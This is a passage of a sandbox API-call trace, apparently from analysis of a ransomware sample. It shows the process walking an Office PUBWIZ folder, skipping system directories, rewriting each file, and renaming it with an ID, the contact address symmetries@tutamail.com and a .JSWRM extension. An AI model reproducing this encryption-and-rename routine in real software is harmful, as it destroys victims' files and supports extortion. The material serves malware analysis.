lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0142.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROGRAM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\program.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.646] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=620) returned 1 [0142.646] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x260) returned 0x207860 [0142.646] ReadFile (in: hFile=0x238, lpBuffer=0x207860, nNumberOfBytesToRead=0x260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesRead=0x345e89c*=0x260, lpOverlapped=0x0) returned 1 [0142.647] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.647] WriteFile (in: hFile=0x238, lpBuffer=0x207860*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesWritten=0x345e898*=0x260, lpOverlapped=0x0) returned 1 [0142.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x207860 | out: hHeap=0x1e0000) returned 1 [0142.647] CloseHandle (hObject=0x238) returned 1 [0142.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0142.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0142.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0142.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0142.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0142.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0142.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0142.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0142.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0142.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0142.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.647] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROGRAM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\program.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PROGRAM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\program.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0142.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0142.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0142.650] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2341b2ec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x934, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PS10TARG.POC", cAlternateFileName="")) returned 1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2=".") returned 1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="..") returned 1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="...") returned 1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="windows") returned -1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="recovery") returned -1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="perflogs") returned 1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="documents and settings") returned 1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="system volume information") returned -1 [0142.650] lstrcmpiW (lpString1="PS10TARG.POC", lpString2="msocache") returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0142.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS10TARG.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS10TARG.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PS10TARG.POC", lpUsedDefaultChar=0x0) returned 12 [0142.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0142.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS10TARG.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS10TARG.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PS10TARG.POC", lpUsedDefaultChar=0x0) returned 12 [0142.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0142.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0142.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0142.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS10TARG.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps10targ.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.651] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2356) returned 1 [0142.651] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x930) returned 0x20c6c0 [0142.651] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x930, lpOverlapped=0x0) returned 1 [0142.657] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.657] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x930, lpOverlapped=0x0) returned 1 [0142.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0142.657] CloseHandle (hObject=0x238) returned 1 [0142.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0142.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0142.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0142.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0142.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0142.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0142.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0142.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0142.657] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS10TARG.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps10targ.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS10TARG.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps10targ.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0142.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0142.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0142.659] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233cee41, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PS2SWOOS.POC", cAlternateFileName="")) returned 1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2=".") returned 1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="..") returned 1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="...") returned 1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="windows") returned -1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="recovery") returned -1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="perflogs") returned 1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="documents and settings") returned 1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="system volume information") returned -1 [0142.659] lstrcmpiW (lpString1="PS2SWOOS.POC", lpString2="msocache") returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0142.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS2SWOOS.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS2SWOOS.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PS2SWOOS.POC", lpUsedDefaultChar=0x0) returned 12 [0142.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0142.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS2SWOOS.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS2SWOOS.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PS2SWOOS.POC", lpUsedDefaultChar=0x0) returned 12 [0142.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0142.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0142.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0142.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS2SWOOS.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps2swoos.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.660] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=752) returned 1 [0142.660] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f0) returned 0x20e550 [0142.660] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x2f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x2f0, lpOverlapped=0x0) returned 1 [0142.661] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.662] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x2f0, lpOverlapped=0x0) returned 1 [0142.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0142.662] CloseHandle (hObject=0x238) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0142.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0142.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0142.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0142.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0142.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.662] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS2SWOOS.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps2swoos.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS2SWOOS.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps2swoos.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0142.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0142.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0142.663] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23467797, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23467797, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PS9CRNRH.POC", cAlternateFileName="")) returned 1 [0142.663] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2=".") returned 1 [0142.663] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="..") returned 1 [0142.663] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="...") returned 1 [0142.663] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="windows") returned -1 [0142.663] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="recovery") returned -1 [0142.663] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="perflogs") returned 1 [0142.663] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="documents and settings") returned 1 [0142.663] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.664] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="system volume information") returned -1 [0142.664] lstrcmpiW (lpString1="PS9CRNRH.POC", lpString2="msocache") returned 1 [0142.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0142.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS9CRNRH.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS9CRNRH.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PS9CRNRH.POC", lpUsedDefaultChar=0x0) returned 12 [0142.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0142.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0142.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS9CRNRH.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PS9CRNRH.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PS9CRNRH.POC", lpUsedDefaultChar=0x0) returned 12 [0142.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0142.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0142.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0142.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0142.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PS9CRNRH.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ps9crnrh.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.665] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1220) returned 1 [0142.665] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4c0) returned 0x230a00 [0142.665] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4c0, lpOverlapped=0x0) returned 1 [0142.669] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.669] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4c0, 